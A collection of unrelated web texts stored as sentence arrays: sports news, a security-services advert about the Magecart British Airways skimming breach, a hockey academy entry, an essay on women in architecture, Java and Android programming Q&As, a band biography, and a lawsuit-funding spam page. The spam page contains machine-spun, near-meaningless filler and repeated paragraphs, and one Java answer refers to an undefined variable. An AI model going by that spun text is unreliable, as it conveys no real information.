allegedly stealing a bicycle on campus.", "\n\nMiles did not comment on Lealaimatafao, though he did say last week that he did not expect him to play this season, which could mean he will redshirt. ", "Lealaimatafao also injured his shoulder when he punched a glass window in the LSU weight room last month.", "\n\nTrue freshman Davon Godchaux of Plaquemine was listed on the roster. ", "He was arrested recently for misdemeanor criminal mischief after allegedly throwing firecrackers into another student’s room as a prank." ]
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[ "Here’s Why You Need Apple Valley Business Network Protection\n\nSome of the most spectacular data breach incidents become case studies shortly after they are reported; such was the situation earlier this year with British Airways, the flag carrier of the United Kingdom, which was targeted by a notorious cybercrime outfit known as Magecart. ", "Details about this particular data breach underscore the need for comprehensive Apple Valley business network protection.", "\n\nIn September 2018, British Airways reported that 380,000 of its customers fell victim to a credit card skimming attack involving its website and mobile app. ", "Over a two-week period, customers who booked British Airways flights online ended up sending their credit card information, including expiration date and even card verification codes, to a rogue server set up by hackers in Romania.", "\n\nCyberattacks Target User Data\n\nThe cybercrime group in question is known to information security specialists as Magecart; this is an outfit that has previously gone after major targets such as Ticketmaster, but it is also suspected to attack smaller businesses in the United States. ", "Magecart hackers typically scan e-commerce websites for vulnerabilities that will allow them to inject malicious code; they will even purchase security certificates so that online shoppers do not suspect that their credit card information is being transmitted to a rogue server.", "\n\nThe British Airways data breach was discovered by a cybersecurity firm that keeps tabs on Magecart. ", "The airline’s IT staff did not detect the breach until British law enforcement agencies contacted them, which suggests that the network was not being actively monitored.", "\n\nSecure Your Apple Valley Business’s Networks\n\nThis particular cyber attack highlights why Apple Valley business network protection is more important than ever. ", "Websites and networks, particularly those that handle e-commerce transactions, need to be constantly monitored. ", "It is important to note that the British Airways data breach did not involve a network intrusion; instead, it involved the injection of 22 lines of malicious code and a redirection of traffic. ", "With the right Apple Valley business network protection solution in place, technicians who monitor systems would be notified about changes to websites, weaknesses, and traffic being sent to unknown servers.", "\n\nAt a time when just a few lines of code can result in the theft of 380,000 credit cards, Apple Valley business network protection is something that you should strongly consider. ", "To learn more about how Sonic Systems can protect your business network against data breaches and other cyber attacks, get in touch with one of our information security specialists today." ]
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[ "A Brilliant Example of Email Done Right\n\nMy friend Marco Marini posted an excellent article on his Blog at ClickMail Marketing. ", "Here’s a copy of the email he received:\n\nHi Marco Marini, I’m writing to tell you that we’re just putting the finishing touches on your order # X55555. ", "It looks terrific and will be on its way to you very soon. ", "I’ll be sending you an email to let you know when it ships.", "\n\nFYI, you can check your order status, view, share or re-order your PhotoBooks anytime at MyBookshelf." ]
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[ "Tahoe Prep Hockey Academy\n\nTahoe Prep Hockey Academy is the first hockey preparatory boarding school in California. ", "It is located in South Lake Tahoe, California on 16.2 acres in the Meyers community. ", "It provides elite high altitude training, athletics and fully accredited NCAA college preparatory academics for student-athletes in the 9th thru 12th grade. ", "Tahoe Prep Academy also offers an additional year for post-graduate students. ", "\n\nThe Tahoe Prep Hockey Academy was founded by Jami James (now of North American Prep in Montana), Leo Fenn, Mike Sechrist & Michael Lewis in 2016. ", "Tahoe Prep Hockey Academy had two teams, Prep & Varsity, in their inaugural season which played in the Anaheim Ducks High School Hockey League and the Western Prep Hockey League for the 2016/17 season. ", "They practice out of their home rink the Tahoe Ice Arena in South Lake Tahoe. ", "The Tahoe Prep Academy has several NHL Players on their advisory board of directors including NHL All-Star and Hall of Fame player, Teemu Selänne, who works closely with his good friend, Leo Fenn, on several different business ventures. ", "Fenn & Selanne founded the Selanne Foundation in 2010 to assist with youth hockey in the Southern California area.", "\n\nFor 2017/18 season, Tahoe Prep Academy team has been approved to play in the North American Hockey League Future Prospects Tournaments in Blaine MN. ", "For the 2018/19 season, Tahoe Prep Academy has joined the NAHL Prep Division which has been created for Prep teams throughout North America. ", "NAHL is generally regarded as the one of the top Junior leagues in North America and competition to the Tier I Elite league. ", "The Tahoe Prep Academy hockey teams are coached under the direction of Mike Lewis from the in the Crease hockey documentary film in 2006 and Leo Fenn, who has coached in So Cal with the JSerra Catholic High School, LA Jr Kings and the Anaheim Jr Ducks programs.", "\n\nReferences\n\nExternal links\nOfficial website\n\nCategory:Schools in California" ]
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[ "Maria Smith, shortlisted for Emerging Woman Architect of the Year in 2013 attempts to bust some myths on why women are under-represented in architecture\n\nWomen in architecture. ", "There, I said it. ", "Whether you’re in the ‘why do we need to talk about this, I just want to be good at my job’ camp or the ‘we must do more to bring our backward profession up to the 21st-century standards it lags so embarrassingly behind’ camp, ‘Women in Architecture’ is probably a phrase that irks. ", "I waver daily between those camps but I am firmly in the ‘get involved or stop whinging’ camp so, here we go: why do women leave architecture?", "\n\nIn the UK, first year architecture studios are about 50:50 male to female, but the profession is male dominated, so somewhere along the line, we’re losing our women. ", "Most discussions revolve around three simple explanations:\n\nOne: Being an architect is horrible – long hours, low pay, stress and poor job satisfaction.", "\n\nTwo: It’s very hard to balance architecture with motherhood.", "\n\nThree: Architecture is sexist, stuck in the wattle and daub ages when it comes to sexual discrimination with a macho culture, unequal pay and unequal opportunities.", "\n\nI’ve always been quietly baffled by why numbers one and two are, in this day and age, still seen as women’s issues, and have almost never personally experienced number three. ", "It’s all too easy to say gender issues are a thing of the past, but it’s not just women who were born while Elvis lived that are leaving architecture, it’s women barely older than Justin Bieber. ", "So do these three popular explanations hold up to scrutiny today?", "\n\nTo investigate, I interviewed Mary Wang and Vere van Gool who set up MISS, a platform that celebrates femininity in design at the Architecture Association. ", "I first met Wang and van Gool when they invited me, along with other female architects including Alison Brooks, Deborah Saunt and Sarah Wigglesworth, to their ‘Fantastic Feast’. ", "All the food was pink and our discussion was directed around challenges female designers face today, how the personal informs the professional, and what happens when design stops and life begins. ", "I also consulted various pieces of research from the Architects’ Journal and RIBA as well as launching a new survey with the AR, which consulted nearly 1,500 people. ", "We did not ask: ‘why do women leave architecture?’ ", "as we felt that question would simply return the three usual explanations. ", "Instead we thought a more sideways probe might reveal something new. ", "Now back to the question at hand.", "\n\nOur first explanation, that architecture is horrible, must ring true for the majority of practising architects, but that does not make it a women’s issue. ", "At best this explanation is a red herring; at worst it supports dodgy statements that architecture is too tough for girls. ", "You can say architecture-is-competitive-and-aggressive-in-a-way-that-women-tend-to-identify-less-with until you’re blue in the face, but until architecture is less eager to revel in its own agony, how can we expect healthy, non-masochistic individuals, male or female, to become architects? ", "So indulge me a minute, and let’s put this aside.", "\n\nSecond, motherhood. ", "Too many contributors to this debate conflate women in architecture with parents in architecture. ", "It is absolutely true that until maternity leave and paternity leave are legally equivalent and transferable and culturally acceptably so, the burden for early childcare will continue to rest predominantly with the mother. ", "But in the UK, one in 10 stay-at-home parents are now men and it’s rising. ", "Since 2011 the second six months’ maternity leave have been transferable to the father and the government are currently working toward paternal leave being fully shared by April next year. ", "We’re not there yet, but all signs point to this becoming a gender neutral issue in the not too distant future. ", "Of course, despite this not only being a women’s issue, it is still an issue. ", "MISS argue that men are more willing to abandon the idea of family than women – and perhaps this will persist for a while. ", "But that men still have to abandon family for architecture goes to long, inflexible hours, and that takes us back to exampanation one, that architecture is horrible, and that fool’s errand.", "\n\nThird, is the architecture industry simply sexist? ", "Now things are getting interesting. ", "While acknowledging that sexism is a real issue for many, I’d like to cautiously suggest that fighting the feminist battle of the 1970s in 2014 is bringing a gun to a knife fight. ", "Today’s battle is much more nuanced and young women feel that they’ve been left a curious legacy by their parents’ generation. ", "The battle of the 20th century sought to remove gender from the equation and this resulted in a polarisation of women: super feminine (traditional) or super masculine (in order that their gender didn’t come into the office with them). ", "So being a woman is now acceptable, but being feminine is not. ", "Now there’s only one way that it’s OK to be feminine, and that’s to be ironically feminine. ", "You can take your Hello Kitty phone out on site, but it’s not OK to just casually wear a skirt to a job interview because your interviewer might think that you think that you’re promoting your sexuality as part of your qualification and it’s a problem if you’re not comfortable with them thinking that you think that. ", "The AR’s survey showed that of architects who claimed to dress like architects, women were much more likely than men to answer that their gender obscured their identity. ", "Do female architects dress how they feel an architect should in fear of their gender getting in the way? ", "I’d believe that. ", "The new battle then is less for women in architecture than for femininity in architecture, whether it’s brought by women or men. ", "Success will be marked by a fluffy pink jumper worn unnoticed.", "\n\nWith two out of the three popular explanations clearly not exclusively women’s issues, and the third looking a bit rough around the edges, MISS opened my eyes to two new (or at least previously little acknowledged) key points that don’t fit into the usual three explanations.", "\n\nPoint one. ", "Architecture is not as creative as it purports to be. ", "In the AR’s recent survey, a whopping 97 per cent considered architecture to be a creative industry, but then you read the comments: ‘only 1 per cent of our time is devoted to creation’, ‘often I feel I’m not as creative as I would like to be’, ‘Yes, or at least it’s still trying to hang on to the idea!’, ", "it goes on. ", "Is it surprising then that students aching to endure the terror of being broken into little pieces and built back up into a virtuoso practitioner of the mother of all the arts, might be a little disappointed? ", "Does this mean that women tend to have more lofty creative expectations? ", "Or does this mean that men are more likely to settle for something they didn’t bargain for? ", "Discuss.", "\n\nPoint two. ", "Architectural education is horrible. ", "Not a shocker, but I do think this point needs to be brought into the women in architecture debate more. ", "Because architectural education prepares students so poorly for architectural practice (let’s debate that later, a lot of people agree), students with not one but two degrees end up spending years of their early professional lives monkeying which is unsurprisingly unattractive. ", "I can’t put it better than this student: ‘I am not really sure if I want to become an architect because I don’t know if I want to not really use my brain for the next 10 years.’ ", "The result is that students feel that the only way to really touch the fabric of life is to start their own practice. ", "As a small practice starter myself, I can confirm that the parenthood and sexism issues do arguably come a little more under your control, but you can take my word for it that that architecture is still horrible: long hours, check; low pay, check; stress, check; poor job satisfaction, sometimes, due to difficulty of small practices getting big projects, check. ", "I do tickle the warm underbelly of real life almost every day though so I can’t complain. ", "To further investigate this new theory we need to ask: are men happier than women having a more abstract existence, monkeying away for a decade? ", "Or, of the men and women that won’t settle for big practice, are the men more likely to strike out on their own, and if so why?", "\n\nBut why, I hear you ask, am I saying that it’s not OK to say women can’t hack a horrible profession like architecture, but that it might be OK to say that women are less impressed by their hopes being dashed? ", "Excellent question! ", "I think it comes down to the difference between saying ‘men are better than women’, and ‘men and women are different’. ", "Do we believe that men and women are fundamentally, biologically different? ", "Or are our variations simply due to our being treated differently by society for squillions of years? ", "If we are different (and I accept that there are persuasive counterarguments to this) then surely we can interact with the world differently.", "\n\nThe women-in-architecture conversation has become stuck on issues of poor working conditions, straying over to parenthood that brings it right back into poor working conditions again. ", "If we can’t break free of this cycle then the debate will inevitably deteriorate from ‘why do women leave?’ ", "to ‘why do men stay?’", "\n\nI’d also like to mention – and this might not make me very popular – that there’s something to be said about being a female architect within a profession that is hyper-aware of its lack of women. ", "The AJ’s Women in Architecture survey showed that 79 per cent of women and 73 per cent of men feel that the profession is too heavily male. ", "Nobody saw the title of this article and thought: women in architecture, that’s a new idea. ", "In the AR survey, only 12 per cent of female architects and architecture students said that their gender sometimes obscured their identity but for men it’s more than double that. ", "It is conceivable then, that being one of the few women in architecture is a massive advantage? ", "If so, that can’t be irrelevant.", "\n\nA fresh gender debate is afoot and what’s more it’s wearing pink and saying ‘girl’ without blinking. ", "As ever, it highlights issues within our profession as a whole and, in considering why young women are leaving, education and training come into sharp focus. ", "This emerging debate operates under a ‘truest things are said in jest’ banner, which I can’t applaud enough, so I would like to end on a light, optimistic note: my favourite comment from the AR survey: ‘If you dress like an architect, do you undress like one?’" ]
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[ "Q:\n\nWho writes the recommendation letters for returning student PhD applicants after a big hiatus?", "\n\nThe answers to previous questions indicate it's possible to apply for and complete a PhD even at age 65+ (example, another example).", "\nIf these applicants did undergraduate studies at a conventional age of 20+, by age 65+, their undergraduate supervisors are probably retired or deceased. ", "Who writes the recommendation letters then (especially if the applicant's job did not involve research)?", "\nIf the answer to this question is also applicable to all students whose supervisors are retired or deceased (e.g. a campus shooting kills all of a student's supervisors), I'll edit the question to include the broader scope.", "\n\nA:\n\nI am not aware of a specific rule requiring academic references. ", "It may be more a matter of common sense. ", "If an applicant has recently completed a lower degree, the committee may expect to hear from professors who saw the applicant's work.", "\nI was admitted to a PhD program over 25 years after my master's degree was awarded. ", "What I had done in the last quarter of a century was far more relevant than my last academic experience.", "\nI got references from my manager, my prior manager, and a chief technology officer. ", "The last person was less familiar with the details of my work, but had a PhD and connections to the department where I was applying.", "\n\n" ]
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[ "Portland Lawsuit Funding & Settlement Loans\n\nFast Lawsuit Loans in Portland, North Dakota\n\nIn the great state of North Dakota and, more specifically, in the city of Portland, Funds4Claims is the best choice as your lawsuit funding source for all of your litigation finance needs. ", "Funds4Claims offers quick and easy, low cost settlement loans to Portland and all of its surrounding areas.", "\nFunds4Claims is a lawsuit funding company that offers low-cost lawsuit loans to residents of Portland and surrounding cities. ", "With Funds4Claims it is easy for residents of Portland to qualify for lawsuit funding, we do not require personal or business credit. ", "The only requirement for a lawsuit cash advance is that you have a valid lawsuit. ", "Our lawsuit financing can help you pay for the cost of litigation or for any other expenses you need money for, we do not carry restrictions on how you use your lawsuit money.", "\nFunds4Claims is a highly respected lawsuit funding company that cares about their clients. ", "We strive to provide financial stability for people living in Portland going through the extensive court processes associated with a lawsuit. ", "In addition, Funds4Claims provides litigation funding in Portland, North Dakota for: Pre Settlement Funding, Post Settlement Funding, Structured Settlement Funding, Commercial Lawsuit Funding, and Law Firm Funding.", "\n\nBest Pre-Settlement Loans in Portland\n\nPersonalized fund is a theme regarding heightened awareness to a lot of inside lighting from the current economic depression. ", "Nevertheless, using the appropriate info, it is possible to reduce costs in addition to pave the best way to some sort of vivid monetary future. ", "Operate the tips in this item to begin on your particular approach currently. ", "A cash advance for Portland residents from Funds4Claims can help you reach financial freedom. ", "We understand how valuable your time is, which is why our application process is quick and easy. ", "Call Funds4Claims today at 855.386.3744 or fill out our simple online lawsuit funding application for fast litigation pre-settlement loan services.", "\nFunds4Claims lawsuit loan services in Portland are established by the merits and strengths of your case and not your credit history. ", "Never turn into stressed as soon as searching for home financing organization. ", "If you are emotion this way, search for helpful tips. ", "This short article aids you with this ways important to acquire lending. ", "Continue reading to comprehend basic principles. ", "Take the initial step to receive your litigation finance by contacting Funds4Claims today.", "\nFunds4Claims is recognized as a frontrunner in the lawsuit funding industry and are preferred by some of the most renowned law firms in the country.", "\n\nFinancial debt might be hard to control while the idea becomes out of control. ", "When individuals are confronted with excessive levels of debts, they frequently study they'll holiday resort to behavior they will certainly not considered they can. ", "In lieu of picking the actual adverse exit, review this post to know how your credit card debt might be resolved simply by debt consolidation reduction. ", "We have professionals with many years of experience in pre settlement loans and personal injury lawsuit funding. ", "The list below showcases some of the personal injury lawsuits we have provided lawsuit funding for to Portland based plaintiffs.", "\n\nFinancial debt might be hard to control while the idea becomes out of control. ", "When individuals are confronted with excessive levels of debts, they frequently study they'll holiday resort to behavior they will certainly not considered they can. ", "In lieu of picking the actual adverse exit, review this post to know how your credit card debt might be resolved simply by debt consolidation reduction. ", "By letting Funds4Claims work for you, we can take that strain off of you. ", "Receive your lawsuit funding by calling Funds4Claims today at 855.386.3744 or simply complete our fast and easy lawsuit funding online application.", "\n\nAPPLY FOR FREE\n\ncompany information\n\nWe keep our lawsuit funding costs low so that we can provide you with the lowest rates and costs." ]
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[ "Lahannya\n\nLahannya is a singer, songwriter and performer. ", "Since 2005 she has been the vocalist and front woman of her own band with Lutz Demmler as co-songwriter, producer and bass player. ", "Lahannya and Lutz are complemented live by Christopher Milden and Luca Mazzucconi.", "\n\nLahannya is well known in the dark alternative scene for her collaborations with Soman, Greenhaus, Xotox and Dracul with whom she performed many gigs and festivals including M'Era Luna and Wave-Gotik-Treffen. ", " Lahannya occasionally DJs at the London alternative club, Slimelight.", "\n\nHistory\n\nEarly days\nLahannya's first release came by complete chance after the US underground label, Zenflesh, came across a demo of her first track, \"Drowning\". ", "They persuaded her to go ahead and record a full version of it for their forthcoming compilation album, Amduscias. ", "Despite being completely on her own, and having no supporting band, she went ahead and was pleasantly surprised at the positive feedback she received as a result. ", "The feedback inspired her to write an EP, which was to form the basis for the band seen today.", "\n\nFormation of the band\nAfter many collaborations with numerous acts, such as Greenhaus and Soman, Lahannya came into contact with Umbra Et Imago bassist Lutz Demmler at the M'Era Luna Festival in 2004. ", "This quickly developed into a friendship and collaboration. ", "A couple of brief line-up changes, towards the end of 2006 the duo came into contact with ex Killing Miranda drummer Belle, and NFD guitarist Chris Milden.", "\n\nShotgun Reality\nThe band now set about writing and recording their debut album, Shotgun Reality. ", "Upon completion they secured support slots with Emilie Autumn and Moon Kana.", "\n\nWelcome To The Underground\nAfter the success of Shotgun Reality, Lahannya worked on a concept EP as the buildup to the band's second album. ", "Upon completion of the EP, Lahannya supported German goth rock band ASP on a 3-week Germany tour. ", "ASP also contributed a remix of the track Inside the Machine to the \"Welcome To The Underground\" EP. ", "Two UK tours followed, which were very successful with audiences continually growing, but the undisputed highlight was Lahannya's performance at the open air amphitheatre Parkbuehne as part of the 4 day Wave Gotik Treffen music festival, in Leipzig, Germany.", "\n\nDefiance\nThe band then released their second album, Defiance, on 19 October 2009.", "\n\nScavenger\nScavenger was released in November 2010 - a stop gap release mixing two new songs and a live DVD from the MFVF 2009.", "\n\nDystopia\nDystopia was released in October 2011 - 12 tracks featuring the previously released Scavenger. ", " This was promoted via numerous UK live dates in autumn 2011 with supporting acts including Pythia.", "\n\nSojourn\nSojourn was released in November 2013 - A 3 disc set, 1 DVD 2 CD. ", " The DVD featuring Live at M'Era Luna August 2012 and Live at Metal Voices Fest (2012), a CD of the same shows and a CD of collaborations. ", " The album was launched with a small UK tour with shows in Cambridge, London and Sheffield.", "\n\nMembers\n\nCurrent line-up\n Lahannya - songwriting / vocalist\n Lutz Demmler - songwriting / bass\n Christopher Milden - guitar\n Luca Mazzucconi - drums\n\nDiscography\n\nAlbums\n 2007: Shotgun Reality\n 2009: Defiance\n 2011: Dystopia\n\nEPs\n 2000: Drowning EP\n 2008: Welcome to the Underground EP\n\nLive albums\n 2013: Sojourn\n\nSingles\n 2007: \"Bleed for Me\"\n\nCompilation albums\n 1998: Amduscias - Various Artists (Zenflesh Records); contributed the track 'Drowning' to this compilation\n\nCollaborations\n 2003: Another Life - Greenhaus (Future Recordings); co-songwriter and vocalist on over half of the tracks on the album\n 2004: Revenge - Soman (Out of Line Music); co-songwritier and vocalist for the track Tears feat. ", "Lahannya\n 2004: Machineries of Joy - Various Artists (Out of Line Music); co-songwriter and vocalist for the track Antique by Soman\n 2004: Sex, Drogen Und Industrial - Combichrist (Out of Line Music); spoken sample for the Soman remix of the title track Sex, Drugs & Industrial\n 2005: [psi] (2 cd version) - Xotox (Pronoize); spoken intro for the included video of the track [psi]\n 2006: Harmonia Mundi - Various Artists (Danse Macabre); co-songwriter and vocalist for the track My Angel by Wintry\n 2006: Like an Animal - Dracul (Spirit Production); co-songwriter and vocalist for the tracks Vampiria's Dream and Deathwish\n 2007: Mask - Soman (Infacted); co-songwriter and vocalist for the tracks Mask and Eye to Eye\n 2007: Nie Mehr - ASP (Trisol); remix of the title track Nie Mehr\n 2008: In Den Zehn Morgen - Xotox (Pronoize); vocalist for the track Habitat\n 2010 : Noistyle - Soman Skin Deep feat. ", "Lahannya\n\nReferences\n\nExternal links \n Official site\n Official Myspace\n Girlband Profile\n\nCategory:English female singers\nCategory:English heavy metal musical groups\nCategory:English rock music groups\nCategory:British electronic music groups\nCategory:Living people\nCategory:Year of birth missing (living people)" ]
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[ "Q:\n\nJava erlang socket communication\n\ni'm having trouble with the socket reading and writing through threads. ", "The server's in erlang and the client in Java. ", "The way i'm doing it is this:\nPrintWriter printer = new PrintWriter(socket.getOutputStream(), true);\nBufferedReader reader = new BufferedReader(new InputStreamReader(System.in));\nTransmitterTwo trans = new TransmitterTwo(socket);\ntrans.start(); // Gets the message from socket\n\nTransmitterTwo Class:\npublic class TransmitterTwo extends Thread {\nSocket socket;\nString message;\n\nTransmitterTwo(Socket socket) {\n this.socket = socket;\n}\n\npublic String getMessageFromSocket() {\n return message;\n}\n\npublic void run() {\n try {\n String response = null;\n BufferedReader reader = new BufferedReader(new InputStreamReader(socket.getInputStream()));\n while ((response = reader.readLine()) !", "= null) {\n System.out.println(\"Server response: \"+ response);\n this.message = response;\n }\n\n socket.close();\n} catch(IOException e) {\n e.printStackTrace();\n}\n}\n}\n\nThe Problem is in the main client class. ", "The idea is to: receive input from the console, send it to the socket, the server handles the logic and sends a response through the socket. ", "Then on this client I check the response and do whatever i need to do. ", "It's a registration flow, i register, i receive \"register_ok\", then i login...etc etc. ", "The part of the loop where i'm having trouble is this:\nwhile(true) {\n String readerInput = reader.readLine(); // Read from console\n printer.println(readerInput.trim()); // Sends it to the socket\n\n while(trans.message == null);\n socketMessage = trans.message;\n\nIs this the right approach? ", "The problem is that 'socketmessage' prints the previous received message, it's like..1 step behind, obviously this is thread related but I can't figure out the problem....help? ", "Thanks\n\nA:\n\nYour current approach is suboptimal because you're wasting your main thread spinning waiting on that variable to be updated. ", "Because of how memory visibility works in java it may appear to never be updated (even if it actually is), or you may get stale values when you do access that variable. ", "A more robust approach would be to pass messages between the threads using some of the built in collections in java: \npublic static void main(String[] args) {\n // This queue will be the link between the threads where \n // they can pass messages to each other\n BlockingQueue<String> messages = new LinkedBlockingQueue<>();\n\n PrintWriter printer = new PrintWriter(socket.getOutputStream(), true);\n BufferedReader reader = new BufferedReader(new InputStreamReader(System.in));\n TransmitterTwo trans = new TransmitterTwo(socket, queue);\n trans.start(); // Gets the message from socket\n\n ...\n\n while(true) {\n String readerInput = reader.readLine(); // Read from console\n printer.println(readerInput.trim()); // Sends it to the socket\n\n // Wait for the other thread to push a message in to the queue.", "\n String recv = messages.take();\n }\n}\n\npublic class TransmitterTwo extends Thread {\n final Socket socket;\n final BlockingQueue<String> queue;\n\n TransmitterTwo(Socket socket, BlockingQueue<String> queue) {\n this.socket = socket;\n this.queue = queue;\n }\n\n public void run() {\n try {\n String response = null;\n BufferedReader reader = new BufferedReader(new InputStreamReader(socket.getInputStream()));\n while ((response = reader.readLine()) !", "= null) {\n System.out.println(\"Server response: \" + response);\n // Add the response from the server to the queue\n queue.add(response);\n }\n\n socket.close();\n } catch (IOException e) {\n e.printStackTrace();\n }\n }\n}\n\nThis approach will never get stale values, and the take() operation on the main thread will block until there is some response from the server.", "\n\n" ]
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[ "Whether English is your native language or an adopted language you’re working on perfecting, you’ve certainly noticed that not all English sounds the same. ", "British and American takes on the language are notably different, with each country having not only its own set of pronunciations, but its own vocabulary which the other knows little about.", "\n\nBeyond that, U.S. residents are highly divided in how they pronounce words and the phrases they prefer to use.", "\n\nThere are a number of noteworthy accents across the United States, though some have a reputation for being particularly unique–and even entertaining–to those who speak a more mild-mannered English. ", "For example, New Yorkers are known for their tendency to pronounce words with an “aw” sound, with “long” sounding more like “lawng” and “coffee” sounding more like “cawfee.”", "\n\nMany would agree that the most exaggerated of all American accents is the Southern accent. ", "If there were a physical indicator of where English most dramatically changes, it would be the Mason-Dixon line, which runs along the southern border of Pennsylvania and serves as a general divide of the North and the South. ", "From a Northerner’s perspective, a Southern accent can run the gamut from negative to positive, unintelligent to charming, depending on the context.", "\n\nPh.", "D student Joshua Katz recently published visualizations of the findings from the Harvard Dialect Survey. ", "Take a look at these informative and amusing examples from the Business Insider based on about the linguistic divide that separates these united states:\n\n1) Is it pronounced like “car-mel” or “car-uh-mel”?", "\n\nThe hard versus soft “a” is an ongoing dispute. ", "It’s hard to believe, but the pronunciation of a word as simple as “caramel” can cause a heated argument between friends!", "\n\n2) Whether you drive on a “freeway” or a “highway” may depend on where you live.", "\n\nA road by any other name may still be a road, but nonetheless, those from the East Coast have their own unique name for major transportation routes:\n\n3) Do you eat like the Average Joe or somebody with superpowers?", "\n\nNow, in the best of circumstances, a locally favored vocabulary item can become a nationally revered treasure. ", "Everyone knows that you just eat subs at home, but when you go to Philly, you have to try a local hoagie! ", "And in New York City, this humble, yet beefed up sandwich gets the ultimate moniker: a hero.", "\n\n4) This one’s obvious, y’all.", "\n\nAs if the epically strong accent weren’t enough to let everyone across the country know who’s from the South and who’s not, there’s one other clear indicator: use of the word “y’all.” ", "If you say it, there’s no getting around it, you are a true Southerner in the eyes of the rest of the country!", "\n\nIf you’re a traveler, it’s especially fun to listen to local accents when you’re out exploring the country. ", "The expressions and accents we hear are inevitably linked to our memories of a place and our impression of a local culture. ", "When you think about that trip you took to New Orleans 3 years ago, you’re likely to remember that hospitable waitress at the restaurant calling you “honey” just as much as you enjoyed eating the Po’ boy she served. ", "And while that sandwich may have been incredible, I bet it’s the friendly Southern lady with an accent who brings a smile to your face when you think about that trip.", "\n\nIf y’all want to perfect your language skills–whether it be English or another language–fill out our inquiry form to learn more about how we can help you reach your goals." ]
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[ "Q:\n\nWhat serializer is Android using behind Bundle.putSerializable?", "\n\nWhat serializer is Android using behind Bundle.putSerializable? ", "\nThe reason I want to know is that I want to write a unit test that checks if my class actually serializes successfully. ", "It implementing java.io.", "Serializable is no guarantee for that.", "\nedit: I guess I can rephrase my question to \"how do I serialize an Object implementing Serializable interface in a Unit test running Junit under Java with Robolectric\"\n\nA:\n\nI'm assuming it uses standard Java Serialization. ", "To simulate, call the writeObject-method on an ObjectOutputStream with the serializable object as input. ", "Then deserialize with readObject() and check the result. ", "\nExample code:\nclass SomeSerializableObject implements Serializable {\n public String SomeProperty;\n}\n\n@Test\npublic void SomeSerializableObject_IsSerializable() throws IOException, ClassNotFoundException {\n // Setup\n SomeSerializableObject obj = new SomeSerializableObject();\n obj.", "SomeProperty = \"Hi!\";", "\n ByteArrayOutputStream bo = new ByteArrayOutputStream(10000);\n ObjectOutputStream os = new ObjectOutputStream(bo);\n\n // Act\n os.writeObject(obj);\n\n // Assert\n byte[] raw = bo.toByteArray();\n ObjectInputStream is = new ObjectInputStream(new ByteArrayInputStream(raw));\n SomeSerializableObject result = (SomeSerializableObject) is.readObject();\n assertEquals(\"Hi!\", ", "result.", "SomeProperty);\n}\n\n" ]
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